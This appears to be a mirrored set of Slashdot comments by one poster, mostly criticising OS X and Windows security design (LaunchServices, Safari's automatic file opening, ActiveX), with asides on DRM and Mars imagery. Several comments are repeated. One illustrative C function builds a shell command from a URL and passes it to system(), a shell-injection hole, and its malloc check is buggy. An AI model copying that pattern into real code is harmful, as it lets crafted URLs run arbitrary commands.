Slashdot Mirror

...and by extension, the size and composition of the firms that notice you.

There's no way to predict; I agree with those who say you'll master the curriculum, but of what use is it in the real world? I picked a company that preached Software Methodology, vs. the ones who wanted a truck routing system written in COBOL, all of their PL/I code converted to COBOL, or custom-built software for their airport parking garage with no specifications in sight. I relocated, scored very above-average pay, only to find that Ferranti International Controls Corporation played at Software Engineering. Any code review might feature the VP of Engineering, who was a pompous know-it-all who'd apparently never heard about leaving one's ego at the door. It would have been Hell, except that I caught a break and was tapped to fill a sudden opening on the UNIX Systems Support team, circa 1987. On top of that bonus, I got to work alongside Peter da Silva and Karl Lehenbauer, both of whom I still count as close friends. BTW, Peter and Karl were both dropouts; Peter makes quite the comfortable living, and Karl's a millionaire.

Go with your instincts, they're 100% correct. It's your conscious mind that'll steer you astray--or keep you standing still, wondering what to do. I presume that you're still young enough to recover from a mistake.

OS X has the same problem.

http://www.scarydevil.com/~peter/io/osx-security.h tml

(and several other notes on http://www.scarydevil.com/~peter/io/ )

As I noted in my comment on larholm.com, this is a long running design flaw in both ahem-mainstream-ahem operating systems. It's really not safe for any browser or other application to trust LaunchServices *or* Windows protocol handler database. The handlers that are suitable for a desktop environment are not generally the ones you want to use from untrusted documents.

OS X has the same problem.

http://www.scarydevil.com/~peter/io/osx-security.h tml

(and several other notes on http://www.scarydevil.com/~peter/io/ )

As I noted in my comment on larholm.com, this is a long running design flaw in both ahem-mainstream-ahem operating systems. It's really not safe for any browser or other application to trust LaunchServices *or* Windows protocol handler database. The handlers that are suitable for a desktop environment are not generally the ones you want to use from untrusted documents.

As I wrote a few years ago in A Failure of Vision the filtering that NASA has been doing to accurately recreate the actual colors of Mars's surface actually makes it harder to tell what you're looking at. If you were living and working on Mars, before long your eyes and brain would adapt and you wouldn't see the red planet as particularly red.

If you go and adjust the ground to the rusty red in NASA's usual photos with this new photograph the water doesn't look nearly so watery any more. But when I lined up the peaks in the red, green, and blue channels to try and get an approximation of the original image (only an approximation, of course... but this has produced realistic looking images for me in the past... reddish, yes, but a red like you might see in Arizona) I got this picture of what appears to be normal-looking (not food-coloring-blue) water.

So my question is... what else have people missed, because they're seeing Mars through Earth-filtered images?

Maybe if a few folks out there tried this trick on other NASA imagery we'd find out.

As I wrote a few years ago in A Failure of Vision the filtering that NASA has been doing to accurately recreate the actual colors of Mars's surface actually makes it harder to tell what you're looking at. If you were living and working on Mars, before long your eyes and brain would adapt and you wouldn't see the red planet as particularly red.

If you go and adjust the ground to the rusty red in NASA's usual photos with this new photograph the water doesn't look nearly so watery any more. But when I lined up the peaks in the red, green, and blue channels to try and get an approximation of the original image (only an approximation, of course... but this has produced realistic looking images for me in the past... reddish, yes, but a red like you might see in Arizona) I got this picture of what appears to be normal-looking (not food-coloring-blue) water.

So my question is... what else have people missed, because they're seeing Mars through Earth-filtered images?

Maybe if a few folks out there tried this trick on other NASA imagery we'd find out.

I don't see anything in the reiew draft or FAQ about voter-confirmable human-readable records (paper ballots, tapes, or other human-readable media). If there is a printed human-countable ballot that the voter can visually confirm was correct and saved then the possibility of electronic fraud is minimized.

Delirant isti Romani!

http://www.scarydevil.com/~peter/mirrors/Asterix/r omans.html :-)

The problem here is that it's almost impossible to avoid using Internet Explorer.

It's a LOT easier now than it was when the alternative was Netscape 4, friend. Don't "lock it down tight", just don't use it at all until you actually need to for something that matters (that would be 'you can't get to your bank account without it'... not 'Youtube is screwing up with Firefox').

Of course, as soon as someone finds an attack vector usable with Apple Events, OS X will be the Emperor's new OS.

Indeed. I am not at all happy that Safari accepts applescript://com.apple.scripteditor without a dialog, but I have been aware of this issue for a while. :)

I used to be a big fan of newspaper reporters. Jimmy Olsen was my hero. In contrast to television crews, newspaper and magazine journalists seemed to have the opportunity to spend the time necessary to get the facts straight, they didn't have to take a complex subject and trim it down to a thirty second sound bite.

But you know, as time went on and I got closer to the heart of some of these stories, I found that the more I knew about the facts the less accurate the stories seemed. That made me wonder, how close to reality were the rest of the stories, the ones I didn't know anything about?
-- Harlan Ellison versus the Crazy Yenta Gossip Line

... couldn't fit on a web page, except maybe using VRML.

http://scarydevil.com/~peter/io/3dworld.html

But Apple is the company that's been placed on a pedestal by it's fanbase and the mainstream media as an enlightened, progressive, cool, hip company, above reproach, and Apple has only played into that.

If Apple was a person "its fanbase and the mainstream media" would be up on charges for stalking.

I get regularly modded down here for pointing at problems like Apple's daft approach to security in Safari. If you want to get on Apple's case for something they can and should do something about, start there.

I haven't read the iTMS EULA, but it's probably the case that burning a song to CD and then ripping the resulting CD is not allowed by it.

The EULA can't override traditional fair use.

Besides, is this really the process that you want to go through in order to make a personal backup copy of your music? Is this what you would expect the average consumer to go through?

Absolutely. When even "honor system" DRM makes users jump through hoops like this to do normal and expected operations, that makes DRM as a whole look bad. Which is good.

Apple is the largest single purveyor of DRM so we started there.

Sony's bigger.

Microsoft's bigger AND more dangerous.

Blockbuster's bigger.

Apple is small potatoes.

Read my response in more detail, paying particular care to the reasons why Apple's clunky, incompetant, incomplete, and inconvenient DRM is good for the consumer.

Why on Earth would the music industry want Apple to licence FairPlay?

Because a balkanized DRM "marketplace" is good for consumers, and bad for the Intellectual Property Misers that run the labels. So since Apple's not caving in to Microsoft they want to see Apple "win" in the DRM wars. Luckily, Apple doesn't want to "win", because they know the only way to win is not to play.

I wish Sony's DRM and Real's DRM were still seriously fighting it out with Microsoft's Trusted Computing software.

But I'll take what I can get.

Expanded on this comment here.

Also noted some of the major inaccuracies in the original article.

I get the feeling that these folks are less concerned about DRM and more concerned about their own convenience.

It's no secret that all software has bugs and vulnerabilities - and like other software companies, we are committed to building software as secure as we can make it and finding and fixing bugs as quickly as possible.

You've had almost 10 years to fix the fundamental design flaw that's by far the biggest source of security problems - the integration of the Browser and the Desktop using ActiveX - and not only has Microsoft NOT backed out that unfixable problem and the layers of kludges (like "security zones") plastered over it, Microsoft risked getting the company torn apart by the DoJ to keep that design in place.

Nobody else has anything like that. Even the dumbest things Apple has done like Open "Safe" Files After Downloading" are miles less daft.

When's Microsoft going th seriously address this?

Absolutely. So simple, and yet so little-known.

Firefox: get rid of the XPI install-from-web stuff.

What in the world is that? Presumably there's a good way to disable it?

(don't treat archives as "safe files",

Yeah. Sheesh.

(in fact there's a lot of ranting I could add here: http://www.scarydevil.com/~peter/io/rant.html

Say! Nice rant.

Apple: Don't "open safe files after downloading"... there are no "safe files".

Well, data files are a lot safer than executable files, but that line just keeps getting blurrier (as witness yesterday's story).

In my 20 years of system administration I have often had people come to me and say "Peter, I just clicked the wrong button and my computer's acting funny." I've less often had people say "Peter, I downloaded a file to the desktop and opened it and my computer's acting funny." I've had several people say "Peter, I just clicked the wrong button AGAIN and I think I'm infected."

I've never had the same person come to me twice with "I've downloaded and opened a file and I'm infected." Give people even a small breathing space to think about what they're doing, without that reflex "gotta push a button" effect, and social social engineering is MUCH harder.

So...

You can solve this for most people simply by not including a mechanism for running untrusted content. Don't pop up a dialog box asking "What do you want to do with this application you just downloaded? (Open) (Show) (Ignore)". Don't even ask "The file you just asked to open is an appliaction? (Infect Me) (Cancel)". Just don't put the user in the position of deciding, right then, what to do with the file. Ever.

Firefox: get rid of the XPI install-from-web stuff. Let the user download the XPI and open it explicitly.

Apple: Dont' "open safe files after downloading"... there are no "safe files".

Microsoft: get rid of ActiveX and security zones and for god's sake don't try and make .NET-in-the-browser into the next Active Desktop disaster.

All of the above: If it's a file you've got a safe application for... a *safe application*, not a *safe file*... open it explicitly IN THAT APPLICATION. Don't go "this is a ZIP file so I'll open it in whatever random program the user has for opening archives". Keep a database of safe programs to use on untrusted content like you keep a database of plugins people have explicitly installed. This would resolve SO MANY security issues... damnit.

(don't treat archives as "safe files", but that's another rant)

(in fact there's a lot of ranting I could add here...)

It's not so easy, removing features, even if they are unsafe.

I know, that's why my recommendation doesn't remove any user-visible features, and even improves the user experience by removing the perceived need for warning dialogs before doing "unsafe" things, and provides a more versatile and flexible tool for managing the whole process.

It would, as far as the user's concerned, add features. And improve security as well.

people never tend to pick on Apple anyway

ORLY?

The worst of Apple's bugs tend to be at the "You know, you really ought to wash your hands after using a public restroom" level.

Microsoft's are more at the "You know, you probably ought to wear protection when having anonymous sex in public restrooms" level.

The whole idea of a web page being able to download and execute code outside the sandbox is just so horribly alien to any kind of sane security model that I'm still boggled at it. And doubly boggled that someone at Microsoft hasn't gone to jail for it yet.

but the holes get FIXED and not denied for months untill the hole is used to destry hundreds of thousands of PCs.

Safari still has "Open Safe Files after Downloading", still uses Launchservices to find the loader for safe files, and still treats installers and archives as "safe files".

This is a flaw that's been left unfixed for two years. This isn't as bad as Microsoft leaving ActiveX around for 10, but still...

One reason *everyone* is more secure than Microsoft Windows is that only Windows has implemented anything even vaguely as bad as the ActiveX/Windows Desktop/IE integration mess.

On the other hand, just about everyone to some degree or another commits the sin of trusting untrustable files. Even the darling of the security set, Firefox, has an installation mechanism that involves executing files directly from the Internet without a user's explicit request.

Apple has "Open safe files after downloading" compounded by the unforgivable sin of treating things like archivers or installers as "safe" files.

I've written about this before.

On a security level, this is like shaking hands after sneezing, compared to Microsoft's fascination with running barefoot through a "Hot Ward" and snogging the Ebola patients, but it's still unacceptable.

Wasn't there a recent spate of OS X exploits, including a virsus or trojan of some sort?

There is no such thing as a "safe" file.

It's not the x86, it's Safari and Launchservices.

Stupid beggars. Microsoft proved that trick never works in 1998.

Apple has already put badly thought out "anti-malware" components in OS X, and they have already failed to detect malware and caused more problems from false positives than they prevent. Until there's enough exploits in the wild that the risk of not running anti-malware is clearly higher than the risks of running it it's crazy to run it.

And that's where we've been at for two years. I brought this up in MAY 2004, June 2004 and January 2005, and in May 2005, as well as numerous times since then.

Apple's would be coding this, not symantec or some third party.

I don't care if Ken Thompson and Dennis Ritchie and the ghost of Alan Turing were coding it, the whole purpose of "anti-malware" code is to detect "suspicious" patterns of activity and block them. It inherently creates a certain amount of false positives, and even the minimal "anti-malware" Apple has already put in OS X has managed to lock me up so I had to ssh in and kill a screen saver that it had decided was doing something suspicious (as noted in the January note above).

Security is about protection, not Convenience.

Security is about defense in depth. Windows has to depend on anti-malware and obtrusive firewall rules because it has so many holes in the system that these "last ditch" defenses are all it can manage. It's possible to design a system that's more convenient and secure by using the right approach.

Such as what's listed at http://www.thexlab.com/faqs/malspyware.html?

Of which the only one found in the wild is a social-engineering attack. Anti-malware can't prevent a social-engineering attack (install this, unpack this and run that, trust us). It can't prevent DRM software being installed even if that DRM software is doing dangerous things, because that's what DRM software is all about (and I've got a fine selection of rants about that if you'd like to hear them)...

Apple has already put badly thought out "anti-malware" components in OS X, and they have already failed to detect malware and caused more problems from false positives than they prevent. Until there's enough exploits in the wild that the risk of not running anti-malware is clearly higher than the risks of running it it's crazy to run it.

And that's where we've been at for two years. I brought this up in MAY 2004, June 2004 and January 2005, and in May 2005, as well as numerous times since then.

Apple's would be coding this, not symantec or some third party.

I don't care if Ken Thompson and Dennis Ritchie and the ghost of Alan Turing were coding it, the whole purpose of "anti-malware" code is to detect "suspicious" patterns of activity and block them. It inherently creates a certain amount of false positives, and even the minimal "anti-malware" Apple has already put in OS X has managed to lock me up so I had to ssh in and kill a screen saver that it had decided was doing something suspicious (as noted in the January note above).

Security is about protection, not Convenience.

Security is about defense in depth. Windows has to depend on anti-malware and obtrusive firewall rules because it has so many holes in the system that these "last ditch" defenses are all it can manage. It's possible to design a system that's more convenient and secure by using the right approach.

Such as what's listed at http://www.thexlab.com/faqs/malspyware.html?

Of which the only one found in the wild is a social-engineering attack. Anti-malware can't prevent a social-engineering attack (install this, unpack this and run that, trust us). It can't prevent DRM software being installed even if that DRM software is doing dangerous things, because that's what DRM software is all about (and I've got a fine selection of rants about that if you'd like to hear them)...

Apple has already put badly thought out "anti-malware" components in OS X, and they have already failed to detect malware and caused more problems from false positives than they prevent. Until there's enough exploits in the wild that the risk of not running anti-malware is clearly higher than the risks of running it it's crazy to run it.

And that's where we've been at for two years. I brought this up in MAY 2004, June 2004 and January 2005, and in May 2005, as well as numerous times since then.

Apple's would be coding this, not symantec or some third party.

I don't care if Ken Thompson and Dennis Ritchie and the ghost of Alan Turing were coding it, the whole purpose of "anti-malware" code is to detect "suspicious" patterns of activity and block them. It inherently creates a certain amount of false positives, and even the minimal "anti-malware" Apple has already put in OS X has managed to lock me up so I had to ssh in and kill a screen saver that it had decided was doing something suspicious (as noted in the January note above).

Security is about protection, not Convenience.

Security is about defense in depth. Windows has to depend on anti-malware and obtrusive firewall rules because it has so many holes in the system that these "last ditch" defenses are all it can manage. It's possible to design a system that's more convenient and secure by using the right approach.

Such as what's listed at http://www.thexlab.com/faqs/malspyware.html?

Of which the only one found in the wild is a social-engineering attack. Anti-malware can't prevent a social-engineering attack (install this, unpack this and run that, trust us). It can't prevent DRM software being installed even if that DRM software is doing dangerous things, because that's what DRM software is all about (and I've got a fine selection of rants about that if you'd like to hear them)...

Although Apple is largely responsible for causing these security flaws, it is hardly something that can be avoided in a modern consumer oriented OS such as Mac OS X.

Yes, it bloody well can.

A key part of this attack should have been closed almost two years ago but Apple 'fixed' the wrong thing.

And they knows there's a problem with LaunchServices, because in Tiger they allow you to override the types of files Safari considers "safe"... unfortunately they still use the LaunchServices database which leaves the "injection" problem intact.

So... Apple can fix these problems. Secure approaches are well known, and have been known for longer than Apple has existed as a company, and they know the problems exist. Why do they leave this hole open? I don't know, possibly because Microsoft does?

there are OS vulnerabilities and application vulnerabilities.

And this is an OS vulnerability. On Mac OS X, LaunchServices is an OS component. It's the normal way to launch GUI applications, including helper applications from web browsers, like the shell in UNIX is the normal way to run command line applications. In UNIX, though, applications that have security concerns don't (or shouldn't ... you do see apps breaking this rule from time to time) call the shell to run applications... they fork() and exec() the desired application directly... because the shell's behaviour isn't controllable or fully predictable.

LaunchServices has many of the same problems. UNFORTUNATELY, there's no general "safe" way to open documents on OS X. It's possible to securely open applications if you know the right application, but it's more complex than just fork/exec, and you have to deal with the difference between old-style Carbon apps and Cocoa appdirs... so Safari and other programs use LaunchServices.

The lack of a "secure applications only" equivalent to LaunchServices is an OS vulnerability. One that must be fixed (alas, Apple didn't fix it the last two times around).

Mac OS X has no vectors for attack except social engineering.

And LaunchServices.

Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.

It's a pity Apple hasn't been paying more attention.

Two years ago, Apple got bit by Safari's blind trust of LaunchServices, at the same time Microsoft got hit by a hole in almost the same application on Windows. Instead of going "oh, maybe Safari shouldn't use the same database for finding helpers as desktop applications do", they went "oh, maybe the helper app database should try and guess if it's being used by an exploit".

That's the same kind of decision Microsoft made in the '90s when they came up with "Active Content" and "Security Zones", and it didn't work for them then. Microsoft isn't likely to back out of that, but, damn, Apple should have noticed what a big blunder that was.

At least they should have backed out of it the first time it came up.

Correct Link.

run_application_on_url(char *app, char *url)
{
  char *buffer = malloc(strlen(app)+strlen(url)+6);
  if(!*buffer) panic("Out of memory on malloc");
  sprintf(buffer, "%s \"%s\" &", app, url);
  system(buffer);
}

I recommend preventing the whole class of exploits by turning off "Open Safe Files", installing Stuffit Expander (but turning off "Mount disk images" in there) and not worrying about "Watch non-default application launches".

But turning "Watch URI schemes" on is worth considering, because Apple's solution doesn't actually prevent the exploit that led to its creation.

This is a new instance on an old and well known security hole in the way Apple uses LaunchServices for untrusted content that I have been talking about for years. The underlying flaw (the idea that "files" rather than the applications that open them need to be "safe") has been exploited before, and will be exploited again if Apple merely fixes this particular instance.

My comment on this from May 2004, getting on for two years ago now.

Microsoft has been in denial about their own (and much nastier and harder to fix without breaking existing code) problem in their browser for almost 10 years now, I hope Apple is smarter.

This will disable any applications that use Terminal.app to run shell scripts (which includes some installers, and a number of utility programs and menu extras), and will not prevent the attack. Terminal.app is not the only application that can be used to launch an unrestricted script.

The two things you should do are:

1. Use Stuffit expander or some other application that doesn't support the __MACOSX hack as your handler for ZIP files, instead of BOMArchiver. This will prevent this attack in any application (including Mail.app and Finder).

2. Disable "Open Safe Files After Downloading" in Safari.

3. Don't open attachments in Mail.app, save them to disk and examine them. Also, don't follow links directly from Mail.app, copy them somewhere first to make sure you're not being phished. Mail.app's handling of untrusted content is pretty skanky in general.

4. Contact Apple and ask them to provide a "Safe Applications" equivalent of LaunchServices that programs like Safari, Firefox, and other programs that have reason to pass untrusted documents to sandboxed applications can use. I have been calling for this for at least a year and a half, every time "Open Safe Files" and other interfaces that use LaunchServices for untrusted documents leads to a security hole, and every time Apple has simply applied another patch that handles one possible attack.

That's what Microsoft has been doing for *their* horrendous security holes in the HTML control since 1997, and they STILL haven't gotten it to work.

It's not possible to find and track all the new holes (this one was opened up by switching from Stuffit Expander to BOMArchiver for zip files, for example), and patching the holes by finding the 'last responsible application' and restricting that only makes the system less reliable and convenient to use... and leaves the fundamental security hole unplugged.

An older post on the same topic.

There are bigger problems in OSX. Auto-installing Dashboard widgets was stupid, and "Open Safe Files After Downloading" (a silly name for "Open Potentially Unsafe Files After Downloading") is an unnecessary risk only minimally mitigated by adding warning dialogs... but at least you can turn it off. More details in these comments:

http://www.scarydevil.com/~peter/io/osx-security.h tml
http://www.scarydevil.com/~peter/io/apple.html
http://www.scarydevil.com/~peter/io/apple2.html

Thankfully even these are not as easily exploited as Microsoft's poisoned gumbo of IE, Outlook, ActiveX, and Security Zones... but Apple really needs to take a good look at the way they approach the Internet, and quit being so trusting.

There are bigger problems in OSX. Auto-installing Dashboard widgets was stupid, and "Open Safe Files After Downloading" (a silly name for "Open Potentially Unsafe Files After Downloading") is an unnecessary risk only minimally mitigated by adding warning dialogs... but at least you can turn it off. More details in these comments:

http://www.scarydevil.com/~peter/io/osx-security.h tml
http://www.scarydevil.com/~peter/io/apple.html
http://www.scarydevil.com/~peter/io/apple2.html

Thankfully even these are not as easily exploited as Microsoft's poisoned gumbo of IE, Outlook, ActiveX, and Security Zones... but Apple really needs to take a good look at the way they approach the Internet, and quit being so trusting.

There are bigger problems in OSX. Auto-installing Dashboard widgets was stupid, and "Open Safe Files After Downloading" (a silly name for "Open Potentially Unsafe Files After Downloading") is an unnecessary risk only minimally mitigated by adding warning dialogs... but at least you can turn it off. More details in these comments:

http://www.scarydevil.com/~peter/io/osx-security.h tml
http://www.scarydevil.com/~peter/io/apple.html
http://www.scarydevil.com/~peter/io/apple2.html

Thankfully even these are not as easily exploited as Microsoft's poisoned gumbo of IE, Outlook, ActiveX, and Security Zones... but Apple really needs to take a good look at the way they approach the Internet, and quit being so trusting.

I don't know about "compatible" control keys, but I'd like more consistency in the command keys, and less dependence on click-key combos. I'd also like to be able to disable "click-and-hold" and "control-click" an force all applications to just use right-click when a multi-button mouse is available.

Definitely agree on the scroll mice.

Finally, the appropriate solution would be to give the user the choice of setting up the toolbar (like Mail.app) with every possible leaf in the menu-tree. Why bicker about "save", when all the leaves in the menu should be allowable targets for the user to put into the toolbar?

Oh yes, I'd also like to be able to add any of these leaves to the contextual menu, too... in fact the toolbar configuration should be expanded to allow you to put any menu item, toolbar icon, or service into either the toolbar or the contextual menu. INCLUDING putting the whole menu in there if I want, so I don't have to go back to the top of the screen all the time.

(and before people start going on about Fitts Law, remember that there's five Fitts Law best-targets on the screen, and one is "where the mouse is")

Perhaps a mechanism to allow for user-specified sort routines, so the user can choose however they want.

Hell yes. And not just in Finder windows, let me sort by date in file open dialogs as well. Or better yet, give me a button in the file open dialog that'll open the corresponding Finder window and turn the dialog into a drag target.

The one feature that Microsoft Windows used to have (I haven't checked recently) is the ability to maneuver around the system without a mouse. I'm not talking about a gazillion shortcut keys, but rather the ability to actually Get Work Done when you have no mouse at all hooked up to the system (or the mouse is buried under a pile of paper and you just need to quickly do some otherwise GUI-based task).

They screwed it up a bit in Windows 9x with the task bar, but mostly this capability is still intact. The one big problem is that you can't cursor into most tooolbars any more, you're expected to use the menus for the corresponding actions... and this has become a problem because some applications no longer have menu actions for all toolbar actions.

Turning on Universal Keyboard Access helps some, but it's still nowhere near complete.

I'd be happy enough with the Amiga solution (Amiga-Arrow keys would move the mouse pointer, and Amiga-Return would send a mouse-click),

You already have this, pretty much. You can turn mouse keys on in Universal Access, and it sucks. It's NOT a viable alternative to Windows keyboard control.

Give me a few and I'm pretty sure I could find others.

Please do. I'm honestly interested, I've been looking for one for a couple of years now.

I'm not an Apple apologist, nor would I ever say you're perfectly safe just because they haven't been exploited yet, or even because the system design is inherently safer than the Windows desktop. But the fact remains that is a better design (it could hardly be worse), and they haven't been subject to spyware or viruses... I think Apple has taken some unfortunate actions with Safari that have the potential of eventually changing the situation for the worse. But right now there are no cases of live viruses or spyware for OS X, and I can't see a credible avenue of attack that would be more effective than plain old social engineering.

Social engineering is a problem, but it's a managable one. You can learn not to be "phished"*.

Turn off "open safe files" in Safari (or, better, use Camino** instead) and don't be phishable: don't open email attachments unless you are expecting them, don't download and run random garbage, and don't trust URLs you get in email. You'll be as close to safe as you can be on any platform, and safer than you would be running Windows even if you run a firewall, a sniffer, antivirus, antispyware, and don't run ANY Microsoft-provided internet or Mail apps.

* I know that this term originated with people stealing passwords, credit card numbers, and other personal info... but the same kinds of social engineering attacks are used by viruses.

** I trust Camino more than Firefox. Mozilla's pluggable extension mechanism is better than Microsoft's ActiveX, but it's still an unnecessary risk. Once Flashblock came to Camino I quit using Firefox.

My Open Letter to Apple about the biggest security flaw they've left hanging. It's purely a theoretical problem so far.

That desktop background looks quite evocative.

However any dashboard that doesn't have cocoa or applescript parts will all run in Safari without any alteration (that I know of).

That's one thing I'd like to get more information about, actually. How exactly are they extending webcore and how much have they opened up for Safari. I'm worried that they're copying Microsoft's greatest mistake.

There is going to be a waiter in space?

If Space Tourism gets off the ground, there's going to be waiters and busboys and skycaps and the annoying guy who wants a tip because he touched your bags when you carried them into the hotel.

Useful Phrases for the Space Tourist, in many languages.

The poor man has probably never had to watch sausage being made before, and is unfamiliar with Sturgeon's Law.

The OP's point is that with just a little bit of critical thinking you can see that there isn't any factual information to link the BBC story to something some unnamed individual said on a mailing list.

The OP made several points. The one I'm objecting to is that the fact that this was on a humorously named website had anything to do with its credibility.

I expect for my news to have really happened.

That would be in some alternate universe, then? Or do you think the fact that we can see the sausage being made means that it's being made any differently than it was in the past?

What realtime interactive full-motion video?.

We're just about ready for realtime interactive 3d user interfaces.

GPUs are good enough that a realtime 3d window manager is possible. It's a much simpler problem than FMV, and Apple's beginning to play with some of the features in Quartz Extreme and Exposé, but until someone actually produces something like my fantasy 3dWM we won't see much demand for it.

Err...

"If you're one of those people who thinks that the US mainstream press doesn't report "the truth" and is completely "in the pocket" of corporations and/or government, then you're already part of the problem."

I call shenanigans!

This is a classic "straw man": proposing an obvious and easily refuted falsehood and representing it as the opposing argument, refuting it, and claiming that you have thereby disproved the opposing argument.

It doesn't matter, then, whether the conspiracy theory you're invoking is true or false, logical or ludicrous, because it has nothing to do with the point our Anonymous Coward was making.

He didn't argue "the US mainstream press [...] is completely "in the pocket" of corporations and/or government", he implied that the US press promoted "a bunch of untrue gossip and sensasionalist trivia".

And he's absolutely right. What Harlan Ellison denigrates as the Crazy Yenta Gossip Line may be full of "a bunch of untrue gossip and sensasionalist trivia", but at least it has feedback mechanisms that let you find out when it's accelerating towards the crackpot event horizon. The mainstream press claims to, but oddly enough when I know what's really behind the stories I'm amazed how obviously wrong they are.

Tcl is great for throwing these things together, and Tk one of the more platform-independent GUI frameworks. That script should run the same on Windows, Mac OS X under native Aqua or X11, or on any other X11/Unix combo.

And it's not a lot of code.

Have a look at something I created as a display tool for sticking on the end of a pipeline that's twiddling password-style files: viewdb.